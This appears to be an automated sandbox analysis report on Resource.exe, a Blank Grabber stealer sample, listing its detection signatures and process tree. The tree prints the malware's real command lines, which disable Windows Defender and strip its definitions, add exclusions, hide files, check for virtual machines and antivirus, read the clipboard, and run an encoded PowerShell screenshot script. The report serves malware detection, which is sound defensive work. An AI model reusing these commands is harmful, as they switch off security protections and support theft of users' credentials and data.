Edit tour

Windows Analysis Report
Resource.exe

Overview

General Information

Sample name:	Resource.exe
Analysis ID:	1584846
MD5:	cd56d1639c638ef44a1cbcf6756ef2ba
SHA1:	784970f33b026fe770d8c0f8938d17b26c428327
SHA256:	79041d419f813d07403d5ea0e190c09f63c0e9339bcf225b4588388de34aaa88
Tags:	BlankGrabberexeuser-aachum
Infos:

Detection

Blank Grabber

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Blank Grabber

Yara detected Telegram RAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Check if machine is in data center or colocation facility

Encrypted powershell cmdline option found

Found many strings related to Crypto-Wallets (likely being stolen)

Found pyInstaller with non standard icon

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Modifies Windows Defender protection settings

Modifies existing user documents (likely ransomware behavior)

Modifies the hosts file

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Removes signatures from Windows Defender

Self deletion via cmd or bat file

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Sigma detected: Rar Usage with Password and Compression Level

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious Ping/Del Command Combination

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: Suspicious Startup Folder Persistence

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses attrib.exe to hide files

Uses cmd line tools excessively to alter registry or file data

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses the Telegram API (likely for C&C communication)

Writes or reads registry keys via WMI

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Sigma detected: Powershell Defender Exclusion

Sigma detected: SCR File Write Event

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious Screensaver Binary File Creation

Stores files to the Windows start menu directory

Too many similar processes found

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Resource.exe (PID: 6632 cmdline: "C:\Users\user\Desktop\Resource.exe" MD5: CD56D1639C638EF44A1CBCF6756EF2BA)

Resource.exe (PID: 6048 cmdline: "C:\Users\user\Desktop\Resource.exe" MD5: CD56D1639C638EF44A1CBCF6756EF2BA)

cmd.exe (PID: 2360 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7232 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 3936 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7288 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)

MpCmdRun.exe (PID: 5972 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)

cmd.exe (PID: 6512 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cannot run with your windows version', 0, 'Error', 0+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 7308 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cannot run with your windows version', 0, 'Error', 0+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

cmd.exe (PID: 4276 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7300 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7192 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7368 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7576 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7636 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 7652 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7712 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 7732 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7788 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7820 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7888 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 8004 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\Resource.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 8092 cmdline: attrib +h +s "C:\Users\user\Desktop\Resource.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

cmd.exe (PID: 8020 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8128 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7372 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 8036 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7196 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7836 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7364 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7740 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 5772 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7732 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7180 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7772 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 5820 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7736 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7628 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systeminfo.exe (PID: 3720 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

cmd.exe (PID: 7620 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7752 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 2820 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7452 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)

csc.exe (PID: 8092 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 2352 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB5E2.tmp" "c:\Users\user\AppData\Local\Temp\erdw4v5g\CSCD6B8C8C98EAE4A66B46BEA9E417699A.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

cmd.exe (PID: 7744 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8056 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 5804 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

